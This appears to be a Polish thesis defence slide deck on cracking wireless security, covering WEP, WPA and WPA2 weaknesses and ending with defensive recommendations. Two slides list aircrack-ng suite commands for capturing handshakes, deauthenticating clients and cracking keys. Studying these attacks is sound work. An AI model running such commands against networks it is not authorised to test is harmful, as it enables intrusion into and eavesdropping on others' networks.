background image

Łamanie 
zabezpieczeń 
sieci 
bezprzewodowyc
h

Adrian Kabała

Krakowska Akademia

im. Andrzeja Frycza Modrzewskiego 

Kierunek: Informatyka i ekonometria

Promotor: prof. zw. Dr hab. Tadeusza Grabińskiego

background image

Cel pracy

Zarys problemu bezpieczeństwa w 
sieciach

Słabości standardu WEP, WPA i WPA2

Problem wynikający z złamania hasła 
przez intruza

background image

Rozdział I – Problem 
bezpieczeństwa w sieciach

jest bardzo ważnym aspektem użytkowania 

Internetu. 

Zagrożenia płynące z Internetu – metody ataków:

Ataki z zewnątrz sieci lokalnej 

(DoS, wirusy, XSS, 

penetracja poprzez sieć bezprzewodową)

Ataki z wnętrza sieci lokalnej 

(ARP, RARP)

Klasy ataków:

Ataki pasywne – podsłuchiwanie

Ataki aktywne – modyfikacja i spreparowanie danych

background image

Ochrona poprzez Firewall

Blokowanie dostępu do usług i komponentów dla osób, 

które nie powinny mieć do nich dostępu

Ochrona systemów przed atakami na dziurawe 

oprogramowanie sieciowe

Ochrona dziurawych systemów operacyjnych

Zapobieganie podsłuchiwaniu oraz wyciekom informacji 

z sieci wew.

Ochrona przed fałszowaniem adresów IP

Wydzielanie fragmentów sieci o zróżnicowanym 

poziomie bezpieczeństwa

background image

Rozdział II - WEP

uniemożliwienie ujawniania 
zawartości transmitowanych 
pakietów, 

uniemożliwienie modyfikacji 
transmitowanych pakietów,

zapewnienie kontroli dostępu do 
sieci.

background image

Uwierzytelnianie w WEP

1. Uwierzytelnianie otwarte (OSA)

2. Uwierzytelnianie kluczem współdzielonym (SKA)

3. Weryfikacja MAC

background image

Rozdział II 

- Bezpieczeństwo sieci 

WEP

zbyt krótki VI (24 bity – wystarczy niecałe 

5000 pakietów, by osiągnąć 

pięćdziesięcioprocentowe 

prawdopodobieństwo kolizji) i dopuszczenie 

powtórnego wykorzystania tego samego VI 

(brak ochrony przed atakami z 

powtórzeniem wiadomości),

brak przyzwoitego sprawdzania 

integralności (algorytm CRC32 nadaje się do 

wykrywania błędów, ale nie jest 

kryptograficznie bezpieczny ze względu na 

swą liniowość),

brak wbudowanej metody aktualizacji kluczy

background image

Słabość WEP

Tylko 16777216 różnych możliwych wartości 
IV

Obecność słabych wartości IV

Inicjalizacja resetuje sekwencje wektora IV

Chop-Chop

background image

Atak na sieć WEP 

airodump-ng wlan0

airodump-ng -c 1 –bssid 
00:16:B6:D9:58:71 wlan0 –w nazwa_pliku

aireplay-ng -0 1 –a 00:16:b6:d9:58:71 –c 
00:60:b3:d4:51:f3 wlan0

aircrack-ng /root/testka/test-01.cap

Hasło: A1:A2:A3:A4:A5

background image

Rozdział III - Bezpieczeństwo 

sieci WPA i WPA2

WPA (2003 r.) WPA2(2004r.)

•Personal  (TKIP, CCMP)

•Enterprise - Radius

background image

Zarządzanie 
kluczami i 
uwierzytelnian
ie

PMK – klucz główny
PTK – dla TKIP: 2 x EAPOL, TEK, 
MIC.
PTK – dla CCMP: – 2 x EAPOL, 
TK

background image

Słabość WPA i WPA2

PMK = PBKDF2 (hasło, SSID, ssidLength, 4096, 

256)

PTK = HMAC, 2x MAC, 2x ID Nonces

background image

Rozdział IV - Tablice tęczowe

• Szybkość
• Oszczędność mocy obliczeniowej
• Duża ilość haseł
• Słaba dostępność

background image

Atak na sieć WPA/WPA2-PSK

1.

Backtrack

2.

airodump-ng mon0

3.

airodump-ng –c 6 -–bbsid 00:1E:E5:99:08:78 
 –w /root/armagedon mon0

4.

  aireplay-ng –0 1 -a 00:1E:E5:99:08:78 –c 
2:E0:2C:5E:4F:DB  mon0

5.

  aircrack-ng –w słownik.txt –b 
00:1E:E5:99:08:78 /root/Armagedon-01.cap

background image

WiFite – łatwiej się nie da.

Atak Wi-Fi Protected Setup

Skrypt pobierający hasła

background image

Wnioski

 

• Nie stosować WEP – nawet 

korzystając z dodatkowych 
zabezpieczeń

• Jeżeli WPA lub WPA2 PSK, to tylko z 

silnym hasłem

• Najlepiej WPA2 – AES, lub Radius

background image

Dziękuje bardzo za uwagę. 


Document Outline